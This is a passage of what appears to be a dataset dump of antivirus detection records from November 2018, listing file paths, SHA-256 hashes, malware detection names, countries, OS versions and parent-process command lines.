  Row(detection=Row(filename='avscan-20181102-013246-bb4358c7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-013241-BA30844D\\AVSCAN-20181102-013246-BB4358C7', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T00:32:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-155024-6d3aa76f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_4db15238\\AVSCAN-20181102-154945-699A47EF\\AVSCAN-20181102-155024-6D3AA76F', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T14:50:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='bluescreenview.exe', filepath='\\\\?\\C:\\Users\\X\\Documents\\bluescreenview-x64\\BlueScreenView.exe', filesize=188000, name='W32/Neshta.A.#M1.#R1'), hash='de8b080dd2ebd867f87027da87309606a943f8e6f9946ce93cce52bf5bb18f7d', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T08:17:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='filezilla_3.29.0_win64-setup_bundled.exe', filepath='\\\\?\\C:\\Users\\X\\Downloads\\FileZilla_3.29.0_win64-setup_bundled.exe', filesize=8852000, name='PUA/FusionCore.P.#M1.#R1'), hash='d93fd89aa6de8363b364f522c38b171dc2a1d1525b7dd0d2c35fab0428c38255', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T16:36:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='skypebrowserhost.exe', filepath='C:\\Program Files (x86)\\Skype\\Browser\\SkypeBrowserHost.exe', filesize=316000, name='W32/Jeefo.A.#M1.#R1'), hash='d71e41ff47dfee3dae7e2ad033dc2f83ebf992acf4d0c5ca531c84e6c84b1f5d', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:04:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-155405-9dd0854d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-154749-72323BAA\\AVSCAN-20181102-155405-9DD0854D', filesize=10368000, name='TR/Eroyee.f062a6.#M1.#R1'), hash='f062a67cda8a7166a774b121aaaed4283fc49b671084b55745a7262df0b7b65e', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:51:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-140704-82b68a8f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e4817a3\\AVSCAN-20181102-140651-807F2E16\\AVSCAN-20181102-140704-82B68A8F', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T13:07:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-125438-741a0931', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_31eb5e36\\AVSCAN-20181102-125311-63F4AB26\\AVSCAN-20181102-125438-741A0931', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='HU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T11:54:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='qipapp.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Roaming\\QIPApp\\QIPApp.exe', filesize=320000, name='HEUR/AGEN.1004090.#M1.#R1'), hash='a9b9b83dae89b09e76c096c14e92449a08ab737fa20012f681990a159f6aa306', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:43:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='hywpwirl.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\hYwpwIrL.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:12:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='adobeairinstaller.exe', filepath='D:\\pindahan\\download\\Programs\\AdobeAIRInstaller.exe', filesize=18412000, name='W32/Sality.AT.#M1.#R1'), hash='abacdc4bf75adeac6ff18b6766f0db093f054719ce425ac0b239b024a784df75', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T03:13:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tarbawy1.exe', filepath='D:\\Dr. Somaya\\اختبار الكادر على شكل من سيربح المليون\\Tarbawy1.exe', filesize=3072000, name='TR/VBCrypt.gwtfm.#M1.#R1'), hash='8ae0ac96a2953b547b712807daa8a8d2b66bf59936f3060f93e9f7154d03f8bc', metadata=Row(cmdline='\\\\\\/s \\\\\\"Symantec Endpoint Protection\\\\\\" \\\\\\/m \\\\\\"C:\\\\\\\\Program Files (x86)\\\\\\\\Symantec\\\\\\\\Symantec Endpoint Protection\\\\\\\\12.1.6306.6100.105\\\\\\\\Bin\\\\\\\\sms.dll\\\\\\" \\\\\\/prefetch:1', country='SA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Symantec\\Symantec Endpoint Protection\\12.1.6306.6100.105\\Bin\\ccSvcHst.exe', parentsize=145008, timestamp='2018-11-02T17:00:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='afcore.dll', filepath='C:\\Program Files\\ArcGIS\\Desktop10.6\\bin\\AfCore.dll', filesize=2560000, name='HEUR/APC.#M1.#R1'), hash='95a691e8363abbbe758b13ba865487d509685132c9464bfbad24ec1288f20d74', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='IR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T18:24:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ai.exe', filepath='I:\\ألعاب\\Games 1\\Project  ( IGI )\\MISSIONS\\location0\\LEVEL13\\AI\\AI.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='a7a0fd00806114fe7d21a90490249b6cf7a2850ba6b44579093c538d5ff6d9d0', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:40:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='psd file.exe', filepath='F:\\psd file\\psd file.exe', filesize=0, name='WORM/Taranis.2225.#M0.#R0'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:43:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='paylines.exe', filepath='I:\\ألعاب\\Games 1\\Dd249\\res\\as\\PayLines\\PayLines.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='c8b2350b7e53a3d3f0a0a513ca9b707f15902e005370150621b869b8f1e6a9d8', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:38:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='patch.exe', filepath='C:\\Program Files\\epsilon net\\TaxSystemSQL\\patch.exe', filesize=167712000, name='TR/Dropper.Gen.#M300.#R3538'), hash='8d698aa664a6471c901217c0604442f468a855aa701cd6bb983d4b42244a3b52', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:9XIYpNZV\\\\\\/EWNkHGW.1', country='GR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=122536, timestamp='2018-11-02T02:34:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-110748-c5448b43', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6ecee166\\AVSCAN-20181102-110735-C33353C8\\AVSCAN-20181102-110748-C5448B43', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='d146370124aef2293ad1d5a50803badc58c645779e423317d330c705ea055319', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T04:07:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ispkcfg.exe', filepath='C:\\1C\\ISSK\\IspKCfg.exe', filesize=512000, name='W32/Sality.AT.#M1.#R1'), hash='e43ae1b86d2b45c2f87f976d91136649f3adfb6eef0aaac3a4e41a9adce09e43', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='KZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-02T10:37:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='feedingfrenzytwo.exe', filepath='F:\\السمكه 2\\0ؤل\\FeedingFrenzyTwo.exe', filesize=1792000, name='W32/Virut.Gen.#M1.#R1'), hash='b48bbcd2819b3c9cb909c85d25e0c7c2ee5a642bd43df21ef6e88dee216b0fe3', metadata=Row(cmdline='\\\\\\/onboot', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Internet Download Manager\\IDMan.exe', parentsize=3986544, timestamp='2018-11-02T23:40:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmpm3_jnkbd', filepath='/tmp/tmpm3_jnkbd', filesize=584000, name='TR/Dropper.VB.b60a2d.#M1.#R1'), hash='b60a2df189b459696768ff978799e748c5b043d1a97652589239b42c76cc2af6', metadata=Row(cmdline=None, country='IE', os_name='Linux', os_vmajor='8', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T02:24:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-030305-4f951bb6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e4d80d8\\AVSCAN-20181102-003900-7AC79805\\AVSCAN-20181102-030305-4F951BB6', filesize=1600000, name='Adware/Agent.urvoa.#M300.#R7636'), hash='de4aca49c68fad604d447cee5fb9f451e831c2dd1aa340d8f3229526c641065d', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:05:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='zemax.exe', filepath='C:\\Program Files\\Zemax\\zemax.exe', filesize=17536000, name='W32/Infector.Gen8.#M300.#R700734'), hash='ff573d5ea1cd7a2912ddc3892e1a23c4ddeac81ae1525b27f0f6216155c86646', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2871808, timestamp='2018-11-02T18:20:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp002384a4', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp002384a4', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T20:21:48Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='895df1f1-280f-31ea-67bc-26affa89c703.exe', filepath='d:\\{86f79ba7-16e0-0585-bcbb-111c3d2220e3}\\895df1f1-280f-31ea-67bc-26affa89c703.exe', filesize=256000, name='TR/Dropper.Gen.#M300.#R4148'), hash='b9aa769660dea8fe55fb82e7fbdb92ad424e01ab4f8865266122e70fd0418051', metadata=Row(cmdline=None, country='AF', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T08:27:42Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='e5d8d1a9160e02fb53037ef3024f7cf75c43b62a5dccac6b64a242b8e2c4b790', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-31.categorizing\\E5D8D1A9160E02FB53037EF3024F7CF75C43B62A5DCCAC6B64A242B8E2C4B790', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='e5d8d1a9160e02fb53037ef3024f7cf75c43b62a5dccac6b64a242b8e2c4b790', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T10:40:22Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-221915-85e1ef3a', filepath='C:\\ProgramData\\Avira\\AntiVir Desktop\\TEMP\\AVSCAN-20181104-221544-6D618304\\AVSCAN-20181104-221915-85E1EF3A', filesize=256000, name='TR/Dropper.Gen.#M300.#R4148'), hash='bbe8ce74b8e86087a23f070c9afaf36cb2a187bea7ac8f43a0e0cb9e73aefb41', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T15:19:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='autmgr32.exe', filepath='D:\\Test_server_backup\\Public\\visual_studio_6.0Disk1\\VFP98\\DISTRIB.SRC\\SYSTEM\\AUTMGR32.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='ba1c1ec10f7445b80823c5e7eda2842be32aa364630bc4aa3495259d5b04f012', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T18:18:40Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-221912-85a1eb44', filepath='C:\\ProgramData\\Avira\\AntiVir Desktop\\TEMP\\AVSCAN-20181104-221544-6D618304\\AVSCAN-20181104-221912-85A1EB44', filesize=256000, name='TR/Dropper.Gen.#M300.#R4148'), hash='bbe8ce74b8e86087a23f070c9afaf36cb2a187bea7ac8f43a0e0cb9e73aefb41', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T15:19:14Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='b360aea851f18d28885d57acd93f352bf18856469f3426cb0676b77ee9d909a2', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-04T09:30:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='da343c443d011a73dc594be01e6d555d8fde1fd2eadfba27a47855aa339522d9', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-32.categorizing\\DA343C443D011A73DC594BE01E6D555D8FDE1FD2EADFBA27A47855AA339522D9', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='da343c443d011a73dc594be01e6d555d8fde1fd2eadfba27a47855aa339522d9', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T16:01:44Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='d1652185c892b5b6d06cd76d0fcd97b20713f3ab628cf34d8a3690bf4b70e4fd', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-32.categorizing\\D1652185C892B5B6D06CD76D0FCD97B20713F3AB628CF34D8A3690BF4B70E4FD', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='d1652185c892b5b6d06cd76d0fcd97b20713f3ab628cf34d8a3690bf4b70e4fd', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T15:17:45Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-184819-cc83da33', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3b095aae\\AVSCAN-20181104-175338-16439388\\AVSCAN-20181104-184819-CC83DA33', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T17:48:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='ce0840c544b73dfca4a44f9b2118657b01ed0c790065af4dec89d3f1972202a5', metadata=Row(cmdline='\\\\\\/Embedding', country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=428032, timestamp='2018-11-04T16:23:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='diagnosticshub.standardcollector.service.exe', filepath='E:\\Windows\\System32\\DiagSvcs\\DiagnosticsHub.StandardCollector.Service.exe', filesize=64000, name='TR/Crypt.XPACK.Gen3.#M300.#R200156'), hash='f30f45f64f9915a54a72936aa73d011b180246953a9e06118d22da07808df075', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T16:39:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='transcodedwallpaper', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='e3e9856fceaf2e00244e8dea7ca6ec30b76af573e21cd489c56aee73f5ca45d5', metadata=Row(cmdline='\\\\\\/NOUACCHECK', country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-04T19:35:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-141107-ea4351c7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a3ac0d7c\\AVSCAN-20181104-140302-AD230418\\AVSCAN-20181104-141107-EA4351C7', filesize=80000, name='TR/Ghokswa.jlssq.#M1.#R1'), hash='fa0ef7cb9d547661d7f48dca8bd1d69c570339caf685aeb3a79b29356344437e', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T07:10:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-200811-5b1dd88f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5e58cd99\\AVSCAN-20181104-200102-24415FE5\\AVSCAN-20181104-200811-5B1DD88F', filesize=64000, name='PUA/DownloadAdmin.Gen.#M1.#R1'), hash='fe815d7b4476802ed1e0db2ce5db36e6aa41aa018b14254899f04673ee2be15c', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:38:10Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='\xa0.exe', filepath='H:\\\xa0\\\xa0.exe', filesize=0, name='WORM/Taranis.2225.#M0.#R0'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T12:40:58Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='f2381c85355994cf5b5e4b66d91a11efbc97f4232b868c8a3e07e686bde28bb4', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-18\\F2381C85355994CF5B5E4B66D91A11EFBC97F4232B868C8A3E07E686BDE28BB4', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='f2381c85355994cf5b5e4b66d91a11efbc97f4232b868c8a3e07e686bde28bb4', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:33:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='f7ebe4b5dc142163af430333a96d45443f54059a605e6edd78e600b325e82c5c', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-31\\F7EBE4B5DC142163AF430333A96D45443F54059A605E6EDD78E600B325E82C5C', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='f7ebe4b5dc142163af430333a96d45443f54059a605e6edd78e600b325e82c5c', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:49:41Z'), dt=datetime.date(2018, 11, 1))],
 [Row(detection=Row(filename='43ece90b6b536a6e39c4d893294f61ec43917c306785515bd289d311197a9e9f', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-5\\43ECE90B6B536A6E39C4D893294F61EC43917C306785515BD289D311197A9E9F', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='43ece90b6b536a6e39c4d893294f61ec43917c306785515bd289d311197a9e9f', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:18:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-090207-9ea48105', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c4ada770\\AVSCAN-20181102-090108-986BECE8\\AVSCAN-20181102-090207-9EA48105', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='MA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:02:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T03:23:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-081455-170a0d4c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d06a0646\\AVSCAN-20181102-080138-99FB5CEE\\AVSCAN-20181102-081455-170A0D4C', filesize=756000, name='PUA/SearchProtect.Gen.#M1.#R1'), hash='65b7afa0c263db4e3ff726247d5864ae4463c7618bd9756e486a2c206e97c09f', metadata=Row(cmdline=None, country='PY', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T11:14:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='idiliwtygoxoalhy', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\idiliwtygoxoalhy', filesize=768000, name='TR/Patched.Bolik.Gen8.#M300.#R700918'), hash='701366491a58a890eb4f141435dfe0842ade497f113034167f1ad20a7474e803', metadata=Row(cmdline='\\\\\\/Processid:{3AD05575-8857-4850-9277-11B85BDB8E09}', country='UA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\dllhost.exe', parentsize=7168, timestamp='2018-11-02T07:24:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='jet40sp5_9xnt.exe', filepath='D:\\Scan\\wulan1\\BACKUP\\BMD Street\\hysys 7.3\\aspenONEV7.3dvd1\\aes731\\aspenonev7.3dvd1\\core\\mdac27sp1\\Jet40SP5_9xNT.exe', filesize=2752000, name='W32/Virut.Gen.#M1.#R1'), hash='3c62c512ced629a03d08b8bd48dfc67b23a6d2c7ac7aaf73e307c050806188bc', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe802_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe802 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T02:41:28Z'), dt=datetime.date(2018, 11, 2)),
